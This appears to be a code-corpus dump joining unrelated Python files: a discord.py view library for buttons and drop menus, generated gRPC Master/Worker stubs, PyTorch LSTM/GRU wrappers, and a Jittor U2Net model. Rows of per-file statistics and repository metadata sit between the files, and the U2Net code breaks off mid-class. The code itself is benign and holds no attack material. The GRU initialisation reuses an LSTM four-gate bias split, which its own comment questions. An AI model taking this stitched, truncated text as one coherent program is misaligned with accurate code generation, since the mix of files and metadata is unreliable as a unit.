        self.components = [button1, button2, button3, menu1, menu2]
        # Components created without an author inherit this view's author.
        for item in self.components:
            if item.author is None:
                item.update(author=self.author)
        # Factory the child widgets use to rebuild this view after an interaction.
        self.root_ = lambda: Btn3And2DropMenu(self.author, self.btn1, self.btn2, self.btn3, self.menu1,
                                              self.menu2, timeout=self.timeout)

    def view(self) -> ui.View:
        """:returns: discord.ui.View"""
        built = ui.View(timeout=self.timeout)
        for item in self.components:
            if item.hidden:
                continue
            wrapper = Btn if isinstance(item, SButton) else Menu
            built.add_item(wrapper(self.root_, item))
        return built
class BtnAnd3DropMenu:
    def __init__(self, author: discord.Member, button1: SButton,
                 menu1: SDropMenu, menu2: SDropMenu, menu3: SDropMenu,
                 *, timeout: Optional[float] = DEFAULT_TIMEOUT):
        """
        Responsive view combining one button and three drop menus.

        :param author: Interaction User
        :param button1: takes button type SButton
        :param menu1: takes dropmenu type SDropMenu
        :param menu2: takes dropmenu type SDropMenu
        :param menu3: takes dropmenu type SDropMenu
        :param timeout: Interaction Timeout
        :returns: view: discord.ui.View
        """
        self.author = author
        self.timeout = timeout
        self.btn1 = button1
        self.menu1 = menu1
        self.menu2 = menu2
        self.menu3 = menu3
        self.components = [button1, menu1, menu2, menu3]
        # Components created without an author inherit this view's author.
        for item in self.components:
            if item.author is None:
                item.update(author=self.author)
        # Factory the child widgets use to rebuild this view after an interaction.
        self.root_ = lambda: BtnAnd3DropMenu(self.author, self.btn1, self.menu1, self.menu2,
                                             self.menu3, timeout=self.timeout)

    def view(self) -> ui.View:
        """:returns: discord.ui.View"""
        built = ui.View(timeout=self.timeout)
        for item in self.components:
            if item.hidden:
                continue
            wrapper = Btn if isinstance(item, SButton) else Menu
            built.add_item(wrapper(self.root_, item))
        return built
class Btn2And3DropMenu:
    def __init__(self, author: discord.Member, button1: SButton, button2: SButton,
                 menu1: SDropMenu, menu2: SDropMenu, menu3: SDropMenu,
                 *, timeout: Optional[float] = DEFAULT_TIMEOUT):
        """
        Responsive Buttons and DropMenus

        :param author: Interaction User
        :param button1: takes button type SButton
        :param button2: takes button type SButton
        :param menu1: takes dropmenu type SDropMenu
        :param menu2: takes dropmenu type SDropMenu
        :param menu3: takes dropmenu type SDropMenu
        :param timeout: Interaction Timeout
        :returns: view: discord.ui.View
        """
        self.author = author
        self.timeout = timeout
        self.btn1 = button1
        self.btn2 = button2
        self.menu1 = menu1
        self.menu2 = menu2
        self.menu3 = menu3
        self.components = [self.btn1, self.btn2,
                           self.menu1, self.menu2, self.menu3]
        # Components created without an author inherit this view's author.
        for component_ in self.components:
            if component_.author is None:
                component_.update(author=self.author)
        # BUG FIX: previously rebuilt a BtnAnd3DropMenu here, silently dropping
        # self.btn2 — after the first interaction the refreshed view lost a
        # button and changed type. Rebuild this class with all six components.
        self.root_ = lambda: Btn2And3DropMenu(self.author, self.btn1, self.btn2, self.menu1,
                                              self.menu2, self.menu3, timeout=self.timeout)

    def view(self) -> ui.View:
        """:returns: discord.ui.View"""
        view_ = ui.View(timeout=self.timeout)
        for component_ in self.components:
            if not component_.hidden:
                if isinstance(component_, SButton):
                    view_.add_item(Btn(self.root_, component_))
                else:
                    view_.add_item(Menu(self.root_, component_))
        return view_
class BtnAnd4DropMenu:
    def __init__(self, author: discord.Member, button1: SButton,
                 menu1: SDropMenu, menu2: SDropMenu, menu3: SDropMenu, menu4: SDropMenu,
                 *, timeout: Optional[float] = DEFAULT_TIMEOUT):
        """
        Responsive view combining one button and four drop menus.

        :param author: Interaction User
        :param button1: takes button type SButton
        :param menu1: takes dropmenu type SDropMenu
        :param menu2: takes dropmenu type SDropMenu
        :param menu3: takes dropmenu type SDropMenu
        :param menu4: takes dropmenu type SDropMenu
        :param timeout: Interaction Timeout
        :returns: view: discord.ui.View
        """
        self.author = author
        self.timeout = timeout
        self.btn1 = button1
        self.menu1 = menu1
        self.menu2 = menu2
        self.menu3 = menu3
        self.menu4 = menu4
        self.components = [button1, menu1, menu2, menu3, menu4]
        # Components created without an author inherit this view's author.
        for item in self.components:
            if item.author is None:
                item.update(author=self.author)
        # Factory the child widgets use to rebuild this view after an interaction.
        self.root_ = lambda: BtnAnd4DropMenu(self.author, self.btn1, self.menu1, self.menu2,
                                             self.menu3, self.menu4, timeout=self.timeout)

    def view(self) -> ui.View:
        """:returns: discord.ui.View"""
        built = ui.View(timeout=self.timeout)
        for item in self.components:
            if item.hidden:
                continue
            wrapper = Btn if isinstance(item, SButton) else Menu
            built.add_item(wrapper(self.root_, item))
        return built
class MultiBtnAndDropMenu:
    def __init__(self, author: discord.Member, buttons: List[SButton], menus: List[SDropMenu],
                 *, timeout: Optional[float] = DEFAULT_TIMEOUT):
        """
        Responsive view built from arbitrary lists of buttons and drop menus.

        :param author: Interaction User
        :param buttons: takes List of button type SButton
        :param menus: takes List of dropmenu type SDropMenu
        :param timeout: Interaction Timeout
        :returns: view: discord.ui.View
        """
        self.author = author
        self.timeout = timeout
        self.btns: List = buttons
        self.menus: List = menus
        # Components created without an author inherit this view's author.
        for item in self.btns + self.menus:
            if item.author is None:
                item.update(author=self.author)
        # Factory the child widgets use to rebuild this view after an interaction.
        self.root_ = lambda: MultiBtnAndDropMenu(
            self.author, self.btns, self.menus, timeout=self.timeout)

    def view(self) -> ui.View:
        """:returns: discord.ui.View"""
        built = ui.View(timeout=self.timeout)
        for button in self.btns:
            if not button.hidden:
                built.add_item(Btn(self.root_, button))
        for menu in self.menus:
            if not menu.hidden:
                built.add_item(Menu(self.root_, menu))
        return built
# Shorter alias for MultiBtnAndDropMenu.
MultiBtnAndMenu = MultiBtnAndDropMenu
class MultiBtnsAndMenus:
    def __init__(self, author: discord.Member, components: List[Union[SButton, SDropMenu]],
                 *, timeout: Optional[float] = DEFAULT_TIMEOUT):
        """
        🌟 Full Flexibility

        Responsive view built from a single mixed list of buttons and drop menus.

        :param author: Interaction User
        :param components: Takes List of components (both buttons and drop menus)
        :param timeout: Interaction Timeout
        :returns: view: discord.ui.View
        """
        self.author = author
        self.timeout = timeout
        self.components = components
        # Components created without an author inherit this view's author.
        for item in self.components:
            if item.author is None:
                item.update(author=self.author)
        # Factory the child widgets use to rebuild this view after an interaction.
        self.root_ = lambda: MultiBtnsAndMenus(
            self.author, self.components, timeout=self.timeout)

    def view(self) -> ui.View:
        """:returns: discord.ui.View"""
        built = ui.View(timeout=self.timeout)
        for item in self.components:
            if item.hidden:
                continue
            if isinstance(item, SButton):
                built.add_item(Btn(self.root_, item))
            elif isinstance(item, SDropMenu):
                built.add_item(Menu(self.root_, item))
            else:
                raise ValueError("The given components are Invalid !")
        return built
| 33.493783
| 118
| 0.593891
| 1,984
| 18,857
| 5.513105
| 0.046875
| 0.043884
| 0.030719
| 0.036204
| 0.900622
| 0.900622
| 0.884988
| 0.882063
| 0.874017
| 0.867617
| 0
| 0.020422
| 0.319669
| 18,857
| 562
| 119
| 33.553381
| 0.832099
| 0.20263
| 0
| 0.730897
| 0
| 0
| 0.002418
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079734
| false
| 0
| 0.019934
| 0
| 0.179402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6d57bfa462e693b0b380d8511c85e1a27e8e755b
| 4,666
|
py
|
Python
|
src/protos/rpc_pb2_grpc.py
|
MrRobertYuan/docklet
|
70c089a6a5bb186dc3f898127af84d79b4dfab2d
|
[
"BSD-3-Clause"
] | 273
|
2016-03-23T08:54:35.000Z
|
2022-01-03T07:49:23.000Z
|
src/protos/rpc_pb2_grpc.py
|
FirmlyReality/docklet
|
203113a5efff89fc961d119de38e5d3759af6f5d
|
[
"BSD-3-Clause"
] | 115
|
2016-04-01T09:51:34.000Z
|
2019-11-14T00:00:48.000Z
|
src/protos/rpc_pb2_grpc.py
|
FirmlyReality/docklet
|
203113a5efff89fc961d119de38e5d3759af6f5d
|
[
"BSD-3-Clause"
] | 64
|
2016-03-31T08:38:29.000Z
|
2021-09-20T07:26:06.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from protos import rpc_pb2 as rpc__pb2
class MasterStub(object):
    # Client-side stub for the 'Master' gRPC service (generated code — do not edit).
    # missing associated documentation comment in .proto file
    pass

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        # Unary-unary call object: serializes a ReportMsg, deserializes a Reply.
        self.report = channel.unary_unary(
            '/Master/report',
            request_serializer=rpc__pb2.ReportMsg.SerializeToString,
            response_deserializer=rpc__pb2.Reply.FromString,
        )
class MasterServicer(object):
    # Server-side base class for the 'Master' service; subclass and override
    # report() with a real implementation (generated code — do not edit).
    # missing associated documentation comment in .proto file
    pass

    def report(self, request, context):
        # Default implementation: signal UNIMPLEMENTED to the client and raise.
        # missing associated documentation comment in .proto file
        pass
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_MasterServicer_to_server(servicer, server):
    # Register `servicer`'s handlers for the 'Master' service on `server`
    # (generated code — do not edit).
    rpc_method_handlers = {
        'report': grpc.unary_unary_rpc_method_handler(
            servicer.report,
            request_deserializer=rpc__pb2.ReportMsg.FromString,
            response_serializer=rpc__pb2.Reply.SerializeToString,
        ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
        'Master', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
class WorkerStub(object):
    # Client-side stub for the 'Worker' gRPC service (generated code — do not edit).
    # missing associated documentation comment in .proto file
    pass

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        # Four unary-unary call objects; vnode calls take a VNodeInfo,
        # task calls take a TaskInfo, and all return a Reply.
        self.start_vnode = channel.unary_unary(
            '/Worker/start_vnode',
            request_serializer=rpc__pb2.VNodeInfo.SerializeToString,
            response_deserializer=rpc__pb2.Reply.FromString,
        )
        self.start_task = channel.unary_unary(
            '/Worker/start_task',
            request_serializer=rpc__pb2.TaskInfo.SerializeToString,
            response_deserializer=rpc__pb2.Reply.FromString,
        )
        self.stop_task = channel.unary_unary(
            '/Worker/stop_task',
            request_serializer=rpc__pb2.TaskInfo.SerializeToString,
            response_deserializer=rpc__pb2.Reply.FromString,
        )
        self.stop_vnode = channel.unary_unary(
            '/Worker/stop_vnode',
            request_serializer=rpc__pb2.VNodeInfo.SerializeToString,
            response_deserializer=rpc__pb2.Reply.FromString,
        )
class WorkerServicer(object):
    # Server-side base class for the 'Worker' service; subclass and override
    # the four methods below (generated code — do not edit). Each default
    # implementation signals UNIMPLEMENTED and raises.
    # missing associated documentation comment in .proto file
    pass

    def start_vnode(self, request, context):
        # missing associated documentation comment in .proto file
        pass
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def start_task(self, request, context):
        # missing associated documentation comment in .proto file
        pass
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def stop_task(self, request, context):
        # missing associated documentation comment in .proto file
        pass
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def stop_vnode(self, request, context):
        # missing associated documentation comment in .proto file
        pass
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_WorkerServicer_to_server(servicer, server):
    # Register `servicer`'s handlers for the 'Worker' service on `server`
    # (generated code — do not edit).
    rpc_method_handlers = {
        'start_vnode': grpc.unary_unary_rpc_method_handler(
            servicer.start_vnode,
            request_deserializer=rpc__pb2.VNodeInfo.FromString,
            response_serializer=rpc__pb2.Reply.SerializeToString,
        ),
        'start_task': grpc.unary_unary_rpc_method_handler(
            servicer.start_task,
            request_deserializer=rpc__pb2.TaskInfo.FromString,
            response_serializer=rpc__pb2.Reply.SerializeToString,
        ),
        'stop_task': grpc.unary_unary_rpc_method_handler(
            servicer.stop_task,
            request_deserializer=rpc__pb2.TaskInfo.FromString,
            response_serializer=rpc__pb2.Reply.SerializeToString,
        ),
        'stop_vnode': grpc.unary_unary_rpc_method_handler(
            servicer.stop_vnode,
            request_deserializer=rpc__pb2.VNodeInfo.FromString,
            response_serializer=rpc__pb2.Reply.SerializeToString,
        ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
        'Worker', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
| 33.328571
| 69
| 0.728461
| 511
| 4,666
| 6.34638
| 0.142857
| 0.040703
| 0.049337
| 0.102683
| 0.894542
| 0.855072
| 0.855072
| 0.819303
| 0.73913
| 0.73913
| 0
| 0.005817
| 0.189456
| 4,666
| 139
| 70
| 33.568345
| 0.851666
| 0.142735
| 0
| 0.555556
| 1
| 0
| 0.094588
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0.090909
| 0.020202
| 0
| 0.151515
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
ed8d77bd171212ba346e5e440a72f3f75dfa0931
| 5,479
|
py
|
Python
|
Models/BiDAF/wrapper.py
|
nguyenvo09/EACL2021
|
9d04d8954c1ded2110daac23117de11221f08cc6
|
[
"MIT"
] | 27
|
2021-01-18T16:03:17.000Z
|
2022-03-05T22:38:34.000Z
|
Models/BiDAF/wrapper.py
|
nguyenvo09/EACL2021
|
9d04d8954c1ded2110daac23117de11221f08cc6
|
[
"MIT"
] | null | null | null |
Models/BiDAF/wrapper.py
|
nguyenvo09/EACL2021
|
9d04d8954c1ded2110daac23117de11221f08cc6
|
[
"MIT"
] | 1
|
2021-11-24T08:23:09.000Z
|
2021-11-24T08:23:09.000Z
|
import torch
import torch.nn as nn
class LSTM(nn.Module):
    """nn.LSTM wrapper: input dropout, custom weight init, packed-sequence forward.

    ``forward`` expects the caller to supply precomputed sort/restore index
    tensors; lengths must sort descending for packing (torch's
    pack_padded_sequence requires sorted input by default).
    """

    def __init__(self, input_size, hidden_size, batch_first=False, num_layers=1, bidirectional=False, dropout=0.2):
        super(LSTM, self).__init__()
        self.rnn = nn.LSTM(input_size=input_size,
                           hidden_size=hidden_size,
                           num_layers=num_layers,
                           bidirectional=bidirectional,
                           batch_first=batch_first)
        self.reset_params()
        # Dropout is applied to the *inputs* in forward(), not inside the LSTM.
        self.dropout = nn.Dropout(p=dropout)

    def reset_params(self):
        """Orthogonal hidden-hidden and Kaiming input-hidden weights; zero
        biases except the forget-gate slice, which is set to 1."""
        for i in range(self.rnn.num_layers):
            nn.init.orthogonal_(getattr(self.rnn, 'weight_hh_l%s' % i))
            nn.init.kaiming_normal_(getattr(self.rnn, 'weight_ih_l%s' % i))
            nn.init.constant_(getattr(self.rnn, 'bias_hh_l%s' % i), val=0)
            nn.init.constant_(getattr(self.rnn, 'bias_ih_l%s' % i), val=0)
            # chunk(4)[1] is the forget-gate slice of PyTorch's (i, f, g, o) bias layout.
            getattr(self.rnn, 'bias_hh_l%s' % i).chunk(4)[1].fill_(1)
            if self.rnn.bidirectional:
                nn.init.orthogonal_(getattr(self.rnn, 'weight_hh_l%s_reverse' % i))
                nn.init.kaiming_normal_(getattr(self.rnn, 'weight_ih_l%s_reverse' % i))
                nn.init.constant_(getattr(self.rnn, 'bias_hh_l%s_reverse' % i), val=0)
                nn.init.constant_(getattr(self.rnn, 'bias_ih_l%s_reverse' % i), val=0)
                getattr(self.rnn, 'bias_hh_l%s_reverse' % i).chunk(4)[1].fill_(1)

    def forward(self, x, return_h=True, max_len=None):
        # x is a 4-tuple: (padded inputs, lengths, sort indices, inverse indices).
        x, x_len, d_new_indices, d_restoring_indices = x
        x = self.dropout(x)
        # Reorder the batch by the caller-provided (descending-length) order.
        x_len_sorted = x_len[d_new_indices]
        x_sorted = x[d_new_indices]  # equivalent to x.index_select(dim=0, index=d_new_indices)
        x_ori_idx = d_restoring_indices
        x_packed = nn.utils.rnn.pack_padded_sequence(x_sorted, x_len_sorted, batch_first=True)
        x_packed, (h, c) = self.rnn(x_packed)
        x = nn.utils.rnn.pad_packed_sequence(x_packed, batch_first=True, total_length=max_len)[0]
        # Undo the sort so rows line up with the caller's original batch order.
        x = x[x_ori_idx]
        if return_h:
            # (layers*dirs, batch, hidden) -> (batch, layers*dirs*hidden), then restore order.
            h = h.permute(1, 0, 2).contiguous().view(-1, h.size(0) * h.size(2))  # .squeeze()
            h = h[x_ori_idx]
        return x, h
class GRU(nn.Module):
    """nn.GRU wrapper mirroring the LSTM class above: input dropout, custom
    weight init, packed-sequence forward with caller-supplied sort indices."""

    def __init__(self, input_size, hidden_size, batch_first=False, num_layers=1, bidirectional=False, dropout=0.2):
        super(GRU, self).__init__()
        self.rnn = nn.GRU(input_size=input_size,
                          hidden_size=hidden_size,
                          num_layers=num_layers,
                          bidirectional=bidirectional,
                          batch_first=batch_first)
        self.reset_params()
        # Dropout is applied to the *inputs* in forward(), not inside the GRU.
        self.dropout = nn.Dropout(p=dropout)

    def reset_params(self):
        """Orthogonal hidden-hidden and Kaiming input-hidden weights; zero
        biases, then chunk(4)[1] of the hh bias set to 1 (copied verbatim from
        the LSTM class — NOTE(review): GRU biases have 3 chunks, not 4, so
        chunk(4)[1] spans parts of the reset/update gates; verify intent)."""
        for i in range(self.rnn.num_layers):
            nn.init.orthogonal_(getattr(self.rnn, 'weight_hh_l%s' % i))
            nn.init.kaiming_normal_(getattr(self.rnn, 'weight_ih_l%s' % i))
            nn.init.constant_(getattr(self.rnn, 'bias_hh_l%s' % i), val=0)
            nn.init.constant_(getattr(self.rnn, 'bias_ih_l%s' % i), val=0)
            getattr(self.rnn, 'bias_hh_l%s' % i).chunk(4)[1].fill_(1)
            if self.rnn.bidirectional:
                nn.init.orthogonal_(getattr(self.rnn, 'weight_hh_l%s_reverse' % i))
                nn.init.kaiming_normal_(getattr(self.rnn, 'weight_ih_l%s_reverse' % i))
                nn.init.constant_(getattr(self.rnn, 'bias_hh_l%s_reverse' % i), val=0)
                nn.init.constant_(getattr(self.rnn, 'bias_ih_l%s_reverse' % i), val=0)
                getattr(self.rnn, 'bias_hh_l%s_reverse' % i).chunk(4)[1].fill_(1)

    def forward(self, x, return_h=True, max_len=None):
        # x is a 4-tuple: (padded inputs, lengths, sort indices, inverse indices).
        x, x_len, d_new_indices, d_restoring_indices = x
        x = self.dropout(x)
        # Reorder the batch by the caller-provided (descending-length) order.
        x_len_sorted = x_len[d_new_indices]
        x_sorted = x[d_new_indices]  # equivalent to x.index_select(dim=0, index=d_new_indices)
        x_ori_idx = d_restoring_indices
        x_packed = nn.utils.rnn.pack_padded_sequence(x_sorted, x_len_sorted, batch_first=True)
        # GRU returns a single hidden state, unlike LSTM's (h, c) pair.
        x_packed, h = self.rnn(x_packed)
        x = nn.utils.rnn.pad_packed_sequence(x_packed, batch_first=True, total_length=max_len)[0]
        # Undo the sort so rows line up with the caller's original batch order.
        x = x[x_ori_idx]
        if return_h:
            # (layers*dirs, batch, hidden) -> (batch, layers*dirs*hidden), then restore order.
            h = h.permute(1, 0, 2).contiguous().view(-1, h.size(0) * h.size(2))  # .squeeze()
            h = h[x_ori_idx]
        return x, h
class Linear(nn.Module):
    """Fully connected layer with Kaiming-normal init and optional input dropout.

    When ``dropout`` is 0 (the default) no dropout module is created at all,
    and ``forward`` is a plain affine map.
    """

    def __init__(self, in_features, out_features, dropout=0.0):
        super(Linear, self).__init__()
        self.linear = nn.Linear(in_features=in_features, out_features=out_features)
        if dropout > 0:
            self.dropout = nn.Dropout(p=dropout)
        self.reset_params()

    def reset_params(self):
        """Kaiming-normal weights, zero bias."""
        nn.init.kaiming_normal_(self.linear.weight)
        nn.init.constant_(self.linear.bias, 0)

    def forward(self, x):
        # The dropout attribute only exists when dropout > 0 was requested.
        if hasattr(self, 'dropout'):
            x = self.dropout(x)
        return self.linear(x)
| 44.544715
| 115
| 0.605585
| 838
| 5,479
| 3.652745
| 0.107399
| 0.066318
| 0.091473
| 0.070565
| 0.879451
| 0.857563
| 0.848416
| 0.848416
| 0.848416
| 0.848416
| 0
| 0.012398
| 0.263917
| 5,479
| 122
| 116
| 44.909836
| 0.746591
| 0.100201
| 0
| 0.766667
| 0
| 0
| 0.065744
| 0.017098
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.022222
| 0
| 0.188889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
edbadc482d03739e5c9fe88d171ebce36e2e568f
| 34,276
|
py
|
Python
|
model/U2Net.py
|
THU-CVlab/JMedSeg
|
1c9c66a1b2c6e4c5e3f70ca9e1ed54447b944755
|
[
"MIT"
] | 26
|
2021-08-19T05:22:44.000Z
|
2022-03-08T05:44:43.000Z
|
model/U2Net.py
|
Jittor/JMedSeg
|
1c9c66a1b2c6e4c5e3f70ca9e1ed54447b944755
|
[
"MIT"
] | null | null | null |
model/U2Net.py
|
Jittor/JMedSeg
|
1c9c66a1b2c6e4c5e3f70ca9e1ed54447b944755
|
[
"MIT"
] | 3
|
2021-08-19T06:12:49.000Z
|
2021-08-19T11:41:16.000Z
|
'''
https://github.com/xuebinqin/U-2-Net
'''
import jittor as jt
from jittor import init
from jittor import nn
class REBNCONV(nn.Module):
    """Conv -> BatchNorm -> ReLU block; padding scales with the dilation rate
    so the 3x3 convolution preserves the spatial size."""

    def __init__(self, in_ch=3, out_ch=3, dirate=1):
        super(REBNCONV, self).__init__()
        self.conv_s1 = nn.Conv(in_ch, out_ch, 3, padding=(1 * dirate), dilation=(1 * dirate))
        self.bn_s1 = nn.BatchNorm(out_ch)
        self.relu_s1 = nn.ReLU()

    def execute(self, x):
        # Convolve, normalise, then activate.
        return self.relu_s1(self.bn_s1(self.conv_s1(x)))
def _upsample_like(src, tar):
    """Bilinearly resize ``src`` to match ``tar``'s spatial dimensions."""
    return nn.upsample(src, size=tar.shape[2:], mode='bilinear')
### RSU-7 ###
class RSU7(nn.Module):
    """Residual U-block with 7 levels (RSU-7 from the linked U-2-Net repo).

    A small encoder-decoder whose output is added to the input projection
    (residual connection) at the end of ``execute``.
    """

    def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
        super(RSU7, self).__init__()
        # Input projection to out_ch; also serves as the residual branch.
        self.rebnconvin = REBNCONV(in_ch, out_ch, dirate=1)
        # Encoder: conv followed by 2x max-pool at each of five levels.
        self.rebnconv1 = REBNCONV(out_ch, mid_ch, dirate=1)
        self.pool1 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.rebnconv2 = REBNCONV(mid_ch, mid_ch, dirate=1)
        self.pool2 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.rebnconv3 = REBNCONV(mid_ch, mid_ch, dirate=1)
        self.pool3 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.rebnconv4 = REBNCONV(mid_ch, mid_ch, dirate=1)
        self.pool4 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.rebnconv5 = REBNCONV(mid_ch, mid_ch, dirate=1)
        self.pool5 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.rebnconv6 = REBNCONV(mid_ch, mid_ch, dirate=1)
        # Bottom level widens the receptive field with dilation instead of pooling.
        self.rebnconv7 = REBNCONV(mid_ch, mid_ch, dirate=2)
        # Decoder: each level consumes the concatenation (2*mid_ch channels) of
        # the upsampled lower level and the matching encoder skip connection.
        self.rebnconv6d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
        self.rebnconv5d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
        self.rebnconv4d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
        self.rebnconv3d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
        self.rebnconv2d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
        # Final decoder level maps back to out_ch so the residual add is valid.
        self.rebnconv1d = REBNCONV((mid_ch * 2), out_ch, dirate=1)

    def execute(self, x):
        hx = x
        hxin = self.rebnconvin(hx)
        # Encoder path: keep each hx{i} as a skip connection for the decoder.
        hx1 = self.rebnconv1(hxin)
        hx = self.pool1(hx1)
        hx2 = self.rebnconv2(hx)
        hx = self.pool2(hx2)
        hx3 = self.rebnconv3(hx)
        hx = self.pool3(hx3)
        hx4 = self.rebnconv4(hx)
        hx = self.pool4(hx4)
        hx5 = self.rebnconv5(hx)
        hx = self.pool5(hx5)
        hx6 = self.rebnconv6(hx)
        hx7 = self.rebnconv7(hx6)
        # Decoder path: upsample, concatenate with the skip, convolve.
        hx6d = self.rebnconv6d(jt.contrib.concat((hx7, hx6), dim=1))
        hx6dup = _upsample_like(hx6d, hx5)
        hx5d = self.rebnconv5d(jt.contrib.concat((hx6dup, hx5), dim=1))
        hx5dup = _upsample_like(hx5d, hx4)
        hx4d = self.rebnconv4d(jt.contrib.concat((hx5dup, hx4), dim=1))
        hx4dup = _upsample_like(hx4d, hx3)
        hx3d = self.rebnconv3d(jt.contrib.concat((hx4dup, hx3), dim=1))
        hx3dup = _upsample_like(hx3d, hx2)
        hx2d = self.rebnconv2d(jt.contrib.concat((hx3dup, hx2), dim=1))
        hx2dup = _upsample_like(hx2d, hx1)
        hx1d = self.rebnconv1d(jt.contrib.concat((hx2dup, hx1), dim=1))
        # Residual connection with the input projection.
        return (hx1d + hxin)
### RSU-6 ###
class RSU6(nn.Module):
    """Residual U-block with 6 encoder levels (RSU-6)."""

    def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
        super().__init__()
        # Input projection; its output is also the residual shortcut.
        self.rebnconvin = REBNCONV(in_ch, out_ch, dirate=1)
        self.rebnconv1 = REBNCONV(out_ch, mid_ch, dirate=1)
        self.pool1 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.rebnconv2 = REBNCONV(mid_ch, mid_ch, dirate=1)
        self.pool2 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.rebnconv3 = REBNCONV(mid_ch, mid_ch, dirate=1)
        self.pool3 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.rebnconv4 = REBNCONV(mid_ch, mid_ch, dirate=1)
        self.pool4 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.rebnconv5 = REBNCONV(mid_ch, mid_ch, dirate=1)
        # Bottom layer uses dilation instead of another pooling step.
        self.rebnconv6 = REBNCONV(mid_ch, mid_ch, dirate=2)
        # Decoder stages take skip + upsampled deeper feature (2*mid_ch).
        self.rebnconv5d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
        self.rebnconv4d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
        self.rebnconv3d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
        self.rebnconv2d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
        self.rebnconv1d = REBNCONV((mid_ch * 2), out_ch, dirate=1)

    def execute(self, x):
        """Run the U-shaped encoder/decoder and add the residual shortcut."""
        x_in = self.rebnconvin(x)
        e1 = self.rebnconv1(x_in)
        e2 = self.rebnconv2(self.pool1(e1))
        e3 = self.rebnconv3(self.pool2(e2))
        e4 = self.rebnconv4(self.pool3(e3))
        e5 = self.rebnconv5(self.pool4(e4))
        e6 = self.rebnconv6(e5)
        d5 = self.rebnconv5d(jt.contrib.concat((e6, e5), dim=1))
        d4 = self.rebnconv4d(jt.contrib.concat((_upsample_like(d5, e4), e4), dim=1))
        d3 = self.rebnconv3d(jt.contrib.concat((_upsample_like(d4, e3), e3), dim=1))
        d2 = self.rebnconv2d(jt.contrib.concat((_upsample_like(d3, e2), e2), dim=1))
        d1 = self.rebnconv1d(jt.contrib.concat((_upsample_like(d2, e1), e1), dim=1))
        return d1 + x_in
### RSU-5 ###
class RSU5(nn.Module):
    """Residual U-block with 5 encoder levels (RSU-5)."""

    def __init__(self, in_ch=3, mid_ch=12, out_ch=3):
        super().__init__()
        # Input projection; its output is also the residual shortcut.
        self.rebnconvin = REBNCONV(in_ch, out_ch, dirate=1)
        self.rebnconv1 = REBNCONV(out_ch, mid_ch, dirate=1)
        self.pool1 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.rebnconv2 = REBNCONV(mid_ch, mid_ch, dirate=1)
        self.pool2 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.rebnconv3 = REBNCONV(mid_ch, mid_ch, dirate=1)
        self.pool3 = nn.Pool(2, stride=2, ceil_mode=True, op='maximum')
        self.rebnconv4 = REBNCONV(mid_ch, mid_ch, dirate=1)
        # Bottom layer uses dilation instead of another pooling step.
        self.rebnconv5 = REBNCONV(mid_ch, mid_ch, dirate=2)
        # Decoder stages take skip + upsampled deeper feature (2*mid_ch).
        self.rebnconv4d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
        self.rebnconv3d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
        self.rebnconv2d = REBNCONV((mid_ch * 2), mid_ch, dirate=1)
